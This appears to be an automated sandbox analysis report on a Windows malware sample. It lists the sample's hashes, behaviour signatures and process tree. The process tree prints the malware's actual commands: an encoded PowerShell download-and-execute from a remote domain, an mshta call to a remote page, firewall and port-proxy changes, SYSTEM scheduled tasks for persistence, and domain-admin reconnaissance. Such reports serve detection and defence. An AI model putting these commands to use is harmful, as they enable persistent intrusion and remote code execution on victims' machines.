Analysis
-
max time kernel
152s -
max time network
153s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
18-05-2021 08:00
Static task
static1
Behavioral task
behavioral1
Sample
02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe
Resource
win10v20210410
General
-
Target
02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe
-
Size
6.6MB
-
MD5
2b1e39fc33f9264f8401f6b59bb0857f
-
SHA1
2553c5666fa5cc37dfc68f35dadc5f026d22bc6b
-
SHA256
02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14
-
SHA512
1750fd743d8a132f6769b418789be6f84b26e9f4b13569d1afa48660ee64885f7bf8b95bb14d87c892e1b39a8bfe8bde7bd0d8ad6eeaefd00bb1a82a3fce17fa
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 20 IoCs
pid Process 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created \??\c:\windows\IOLIyDqS.exe cmd.exe File opened for modification \??\c:\windows\IOLIyDqS.exe cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1976 schtasks.exe 796 schtasks.exe 1308 schtasks.exe -
Gathers network information 2 TTPs 3 IoCs
Uses commandline utility to view network configuration.
pid Process 512 ipconfig.exe 308 ipconfig.exe 1380 netstat.exe -
Modifies data under HKEY_USERS 32 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host WScript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software WScript.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{B155BDF8-02F0-451E-9A26-AE317CFD7779} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 0100000000000000104c8cf62f4cd701 WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ cmd.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{35786D3C-B075-49B9-88DD-029876E11C01} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 0100000000000000f02785f62f4cd701 WScript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings WScript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" WScript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" WScript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" cmd.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WScript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe -
Suspicious use of AdjustPrivilegeToken 42 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1192 WMIC.exe Token: SeSecurityPrivilege 1192 WMIC.exe Token: SeTakeOwnershipPrivilege 1192 WMIC.exe Token: SeLoadDriverPrivilege 1192 WMIC.exe Token: SeSystemProfilePrivilege 1192 WMIC.exe Token: SeSystemtimePrivilege 1192 WMIC.exe Token: SeProfSingleProcessPrivilege 1192 WMIC.exe Token: SeIncBasePriorityPrivilege 1192 WMIC.exe Token: SeCreatePagefilePrivilege 1192 WMIC.exe Token: SeBackupPrivilege 1192 WMIC.exe Token: SeRestorePrivilege 1192 WMIC.exe Token: SeShutdownPrivilege 1192 WMIC.exe Token: SeDebugPrivilege 1192 WMIC.exe Token: SeSystemEnvironmentPrivilege 1192 WMIC.exe Token: SeRemoteShutdownPrivilege 1192 WMIC.exe Token: SeUndockPrivilege 1192 WMIC.exe Token: SeManageVolumePrivilege 1192 WMIC.exe Token: 33 1192 WMIC.exe Token: 34 1192 WMIC.exe Token: 35 1192 WMIC.exe Token: SeIncreaseQuotaPrivilege 1192 WMIC.exe Token: SeSecurityPrivilege 1192 WMIC.exe Token: SeTakeOwnershipPrivilege 1192 WMIC.exe Token: SeLoadDriverPrivilege 1192 WMIC.exe Token: SeSystemProfilePrivilege 1192 WMIC.exe Token: SeSystemtimePrivilege 1192 WMIC.exe Token: SeProfSingleProcessPrivilege 1192 WMIC.exe Token: SeIncBasePriorityPrivilege 1192 WMIC.exe Token: SeCreatePagefilePrivilege 1192 WMIC.exe Token: SeBackupPrivilege 1192 WMIC.exe Token: SeRestorePrivilege 1192 WMIC.exe Token: SeShutdownPrivilege 1192 WMIC.exe Token: SeDebugPrivilege 1192 WMIC.exe Token: SeSystemEnvironmentPrivilege 1192 WMIC.exe Token: SeRemoteShutdownPrivilege 1192 WMIC.exe Token: SeUndockPrivilege 1192 WMIC.exe Token: SeManageVolumePrivilege 1192 WMIC.exe Token: 33 1192 WMIC.exe Token: 34 1192 WMIC.exe Token: 35 1192 WMIC.exe Token: SeDebugPrivilege 1672 powershell.exe Token: SeDebugPrivilege 1380 netstat.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1360 wrote to memory of 1416 1360 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 27 PID 1360 wrote to memory of 1416 1360 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 27 PID 1360 wrote to memory of 1416 1360 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 27 PID 1360 wrote to memory of 1416 1360 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 27 PID 1416 wrote to memory of 796 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 31 PID 1416 wrote to memory of 796 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 31 PID 1416 wrote to memory of 796 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 31 PID 1416 wrote to memory of 796 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 31 PID 796 wrote to memory of 1192 796 cmd.exe 32 PID 796 wrote to memory of 1192 796 cmd.exe 32 PID 796 wrote to memory of 1192 796 cmd.exe 32 PID 796 wrote to memory of 1192 796 cmd.exe 32 PID 1416 wrote to memory of 820 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 34 PID 1416 wrote to memory of 820 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 34 PID 1416 wrote to memory of 820 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 34 PID 1416 wrote to memory of 820 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 34 PID 820 wrote to memory of 656 820 cmd.exe 35 PID 820 wrote to memory of 656 820 cmd.exe 35 PID 820 wrote to memory of 656 820 cmd.exe 35 PID 820 wrote to memory of 656 820 cmd.exe 35 PID 656 wrote to memory of 1892 656 net.exe 36 PID 656 wrote to memory of 1892 656 net.exe 36 PID 656 wrote to memory of 1892 656 net.exe 36 PID 656 wrote to memory of 1892 656 net.exe 36 PID 1416 wrote to memory of 1112 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 37 PID 1416 wrote to memory of 1112 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 37 PID 1416 wrote to memory of 1112 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 37 PID 1416 wrote to memory of 1112 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 37 PID 1112 wrote to memory of 824 1112 cmd.exe 38 PID 1112 wrote to memory of 824 1112 cmd.exe 38 PID 1112 wrote to memory of 824 1112 cmd.exe 38 PID 1112 wrote to memory of 824 1112 cmd.exe 38 PID 824 wrote to memory of 1156 824 net.exe 39 PID 824 wrote to memory of 1156 824 net.exe 39 PID 824 wrote to memory of 1156 824 net.exe 39 PID 824 wrote to memory of 1156 824 net.exe 39 PID 1416 wrote to memory of 1672 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 40 PID 1416 wrote to memory of 1672 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 40 PID 1416 wrote to memory of 1672 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 40 PID 1416 wrote to memory of 1672 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 40 PID 1416 wrote to memory of 1308 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 41 PID 1416 wrote to memory of 1308 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 41 PID 1416 wrote to memory of 1308 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 41 PID 1416 wrote to memory of 1308 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 41 PID 1308 wrote to memory of 512 1308 cmd.exe 42 PID 1308 wrote to memory of 512 1308 cmd.exe 42 PID 1308 wrote to memory of 512 1308 cmd.exe 42 PID 1308 wrote to memory of 512 1308 cmd.exe 42 PID 1416 wrote to memory of 308 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 43 PID 1416 wrote to memory of 308 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 43 PID 1416 wrote to memory of 308 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 43 PID 1416 wrote to memory of 308 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 43 PID 1416 wrote to memory of 1380 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 44 PID 1416 wrote to memory of 1380 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 44 PID 1416 wrote to memory of 1380 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 44 PID 1416 wrote to memory of 1380 1416 02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe 44 PID 1880 wrote to memory of 688 1880 WrsgoFoe.exe 46 PID 1880 wrote to memory of 688 1880 WrsgoFoe.exe 46 PID 1880 wrote to memory of 688 1880 WrsgoFoe.exe 46 PID 1880 wrote to memory of 688 1880 WrsgoFoe.exe 46 PID 688 wrote to memory of 1836 688 cmd.exe 48 PID 688 wrote to memory of 1836 688 cmd.exe 48 PID 688 wrote to memory of 1836 688 cmd.exe 48 PID 688 wrote to memory of 1836 688 cmd.exe 48
Processes
-
C:\Users\Admin\AppData\Local\Temp\02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe"C:\Users\Admin\AppData\Local\Temp\02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Users\Admin\AppData\Local\Temp\02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe"C:\Users\Admin\AppData\Local\Temp\02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe"2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\SysWOW64\cmd.execmd /c wmic ntdomain get domainname3⤵
- Suspicious use of WriteProcessMemory
PID:796 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic ntdomain get domainname4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1192
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net localgroup administrators3⤵
- Suspicious use of WriteProcessMemory
PID:820 -
C:\Windows\SysWOW64\net.exenet localgroup administrators4⤵
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators5⤵PID:1892
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net group "domain admins" /domain3⤵
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Windows\SysWOW64\net.exenet group "domain admins" /domain4⤵
- Suspicious use of WriteProcessMemory
PID:824 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 group "domain admins" /domain5⤵PID:1156
-
-
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -exec bypass "import-module C:\Users\Admin\AppData\Local\Temp\m2.ps1"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1672
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /all3⤵
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /all4⤵
- Gathers network information
PID:512
-
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all3⤵
- Gathers network information
PID:308
-
-
C:\Windows\SysWOW64\netstat.exenetstat -na3⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:1380
-
-
-
C:\Windows\WrsgoFoe.exeC:\Windows\WrsgoFoe.exe1⤵
- Suspicious use of WriteProcessMemory
PID:1880 -
C:\Windows\SysWOW64\cmd.execmd /c call "c:\windows\temp\tmp.vbs"2⤵
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:688 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"3⤵
- Modifies data under HKEY_USERS
PID:1836 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo uDvs >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53© /y c:\windows\temp\svchost.exe c:\windows\IOLIyDqS.exe&move /y c:\windows\temp\dig.exe c:\windows\alMTmPEA.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn IOLIyDqS /tr "C:\Windows\IOLIyDqS.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\OgPCbvuh" /tr "c:\windows\alMTmPEA.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pMRBKYMNO"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\alMTmPEA.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\IOLIyDqS.exe"&schtasks /run /TN escan)4⤵
- Drops file in Windows directory
PID:828 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening tcp 65533 DNSd5⤵
- Modifies data under HKEY_USERS
PID:1084
-
-
C:\Windows\SysWOW64\netsh.exenetsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=535⤵
- Modifies data under HKEY_USERS
PID:2144
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F5⤵
- Creates scheduled task(s)
PID:1976
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn IOLIyDqS /tr "C:\Windows\IOLIyDqS.exe" /F5⤵
- Creates scheduled task(s)
PID:796
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\OgPCbvuh" /tr "c:\windows\alMTmPEA.exe" /F5⤵
- Creates scheduled task(s)
PID:1308
-
-
-
-
-
C:\Windows\MuzZLUPM.exeC:\Windows\MuzZLUPM.exe1⤵PID:1340